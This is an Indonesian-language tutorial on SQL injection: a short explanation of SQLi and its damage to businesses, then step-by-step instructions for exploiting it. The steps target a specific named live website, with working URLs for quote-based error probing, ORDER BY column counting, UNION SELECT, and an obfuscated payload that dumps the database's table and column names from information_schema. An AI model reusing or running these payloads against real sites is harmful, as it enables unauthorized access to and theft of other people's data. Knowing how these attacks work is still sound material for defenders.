Injeksi SQL, juga dikenal sebagai SQLI, adalah vektor serangan yang sering menggunakan kode SQL berbahaya untuk manipulasi basis data backend untuk mendapatkan akses ke data yang sebelumnya tidak dimaksudkan untuk ditampilkan. Catatan ini mungkin juga mencakup berbagai item, seperti data perusahaan yang sensitif, daftar konsumen, atau detail pribadi konsumen.
Pengaruh injeksi SQL pada perusahaan komersial sangat luas. Serangan yang menguntungkan mungkin juga berakhir dengan tampilan daftar orang yang tidak sah, penghapusan seluruh tabel dan, dalam kasus positif, penyerang mendapatkan hak administratif ke database, yang semuanya cukup merusak bisnis.
Saat menghitung biaya SQLi yang masuk akal, penting untuk mempertimbangkan hilangnya kepercayaan pelanggan terhadap statistik non-publik seperti nomor ponsel, alamat, dan poin penting kartu kredit yang dicuri.
Meskipun vektor ini dapat digunakan untuk menyerang basis data SQL apa pun, situs web adalah target yang paling sering terjadi.
Cara Meng-Eksekusi Bug SQL
Untuk Eksekusi Bug sqli perlu situs web yang rentan akan sqli, saya sudah menyiapkan situs web yang rentan terhadap SQL klik disini
1.Tambahkan tanda ' di bagian paling belakang dan terlihat website eror.
2.Langkah berikutnya adalah Menemukan ujung angka eror, yang perlu di lakukan adalah menambahkan kode order+by+ dan angka. Seperti query dibawah ini
https://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+1,2,3,4,5,6--+-.
3.Bila di enter link di atas ini akan menampilkan Unknown column '6' in 'order clause' Jika angka 6 di hapus maka website akan kembali normal.
4.Lanjut ke langka berikutnya Adalah menggenti order by dengan +union+select+. Seperti dibawah ini
https://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=-1%27+union+select+1,2,3,4,5--+-
Jika query di atas ini kita enter akan muncul angka yang kita perlukan untuk memasukkan kode injeksi nya.
5.Memasukan kode injeksi untuk membuka database website. Menghapus angka yang muncul di query tersebut untuk menempelkan kode injeksi untuk membuka database.
contoh:https://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=-1%2527+union+select+1,2,3,concat(0x494e4a454354204259204d522e464d52,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/),5--+-
